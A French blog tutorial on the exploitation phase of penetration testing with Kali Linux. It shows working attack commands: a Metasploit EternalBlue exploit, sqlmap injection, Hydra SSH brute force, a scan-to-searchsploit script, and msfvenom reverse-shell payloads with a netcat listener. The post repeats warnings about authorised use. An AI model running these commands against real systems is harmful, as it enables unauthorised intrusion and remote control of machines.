“J’ai trouvé une faille” – Phrase qui fait suer 97% des DSI et 100% des juristes.
On y est. Après avoir scanné, exploré et flairé comme un renard numérique, vient le moment du grand frisson : l’exploitation. Cette phase du pentest vise à tirer profit d’une vulnérabilité pour obtenir un accès, exécuter du code, ou déclencher une compromission. En clair ? On entre.
🚨 Avertissement légal express (encore)
Oui, c’est excitant. Oui, ça donne un petit pouvoir.
Non, tu ne fais pas ça chez ton ex ou sur le Wi-Fi du voisin.
L’exploitation sans autorisation explicite = illégal = tribunal = amende = “vous avez quelque chose à déclarer, monsieur ?”.
🧰 Les outils d’exploitation indispensables sur Kali
🧨 1. Metasploit Framework
LE framework d’exploitation. Modules prêts à l’emploi, interface CLI ou web (msfconsole
ou msfvenom
).
bashmsfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
Tu viens (peut-être) de compromettre une machine Windows vulnérable à EternalBlue. Bien joué, 2017.
🧨 2. Searchsploit
Interface locale de la base de données Exploit-DB. Rapide, offline, pratique.
bashsearchsploit apache 2.4.49
Pro tip : tu peux coupler ça à un copier-coller du PoC dans Kali directement.
🧨 3. sqlmap
Automatise les injections SQL. Ça scanne, ça extrait, et parfois… ça te donne un shell.
bashsqlmap -u "http://site.com/page.php?id=3" --dbs
Ajoute
--risk=3 --level=5
si tu veux vraiment jouer avec le feu.
🧨 4. Hydra
Brute force à gogo : SSH, FTP, HTTP, RDP, etc.
bashhydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
N’oublie pas de limiter les tentatives pour ne pas te faire bannir en 3 secondes.
🧨 5. Nikto
Scan de vulnérabilités web. Très bruyant, mais rapide à dégainer.
bashnikto -h http://target.local
⚙️ Mini-pipeline d’exploitation automatisé (scan > exploit)
Voici un script rudimentaire bash pour faire un enchaînement simple :
bash#!/bin/bash
TARGET=$1
if [ -z "$TARGET" ]; then
echo "Usage: $0 <IP cible>"
exit 1
fi
echo "[+] Scan de ports..."
nmap -sS -sV -p- $TARGET -oN portscan.txt
echo "[+] Recherche de vulnérabilités..."
grep -E "open.*(http|ftp|ssh|smb|mysql)" portscan.txt | while read line; do
service=$(echo $line | awk '{print $3}')
port=$(echo $line | awk '{print $1}' | cut -d '/' -f 1)
echo "Recherche sur $service (port $port)..."
searchsploit $service
done
Tu ne vas pas lancer d’exploit tout de suite, mais tu prépares le terrain… et c’est la base.
🪛 Et pour les fans de Metasploit : un générateur de payload
bashmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
Couple ça avec un listener multi/handler
et t’es prêt pour du post-exploitation.
🧨 Bonus : créer une backdoor… éthique
bashmsfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf > shell.elf
chmod +x shell.elf
Puis côté écoute :
bashnc -lvnp 4444
Utilise ça uniquement dans un cadre légal et sur des systèmes autorisés. Pas sur le NAS du bureau.
🧯 En résumé
L’exploitation, c’est le feu d’artifice du pentest. Mais pour que ça ne tourne pas au carnage, il faut de la méthode, de la préparation, et du sang-froid. Et surtout, savoir quoi faire une fois dedans (c’est justement le sujet du prochain article).
Prochain arrêt : Post-Exploitation et persistance, ou l’art de rester discret tout en récoltant le max d’infos. On y parlera de Mimikatz, BloodHound, PowerShell, et autres joyeusetés.